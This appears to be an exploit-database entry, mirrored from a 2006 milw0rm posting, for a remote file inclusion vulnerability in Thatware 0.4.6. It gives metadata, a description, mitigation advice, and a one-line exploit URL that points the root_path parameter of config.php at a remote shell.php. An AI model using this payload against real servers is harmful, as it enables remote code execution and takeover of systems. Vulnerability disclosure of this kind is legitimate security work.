header-logo
Suggest Exploit
vendor:
Thatware
by:
Drago84
9,3
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Thatware
Affected Version From: 0.4.6
Affected Version To: 0.4.6
Patch Exists: YES
Related CWE: N/A
CPE: thatware
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Thatware 0.4.6 (root_path) Remote File Inclusion

Thatware 0.4.6 is vulnerable to a remote file inclusion vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. The malicious request contains a URL in the root_path parameter that points to a malicious file hosted on a remote server. This malicious file can be executed on the vulnerable server, allowing the attacker to gain access to the server.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated before being used in the application. Additionally, the application should be configured to only allow access to files that are necessary for the application to function.
Source

Exploit-DB raw data:

Thatware  0.4.6 (root_path) Remote File Inclusion

CreW: ToXiC

Bug Found by Drago84

Source Code:
http://ufpr.dl.sourceforge.net/sourceforge/thatware/thatware_0.4.6.tar.gz

Page Affect
config.php

ExP:
http://server/dir_thatware/config.php?root_path=http://server/shell.php'

Greatz: str0ke

# milw0rm.com [2006-08-10]

Navigation

Suggest Exploit

Services By CQR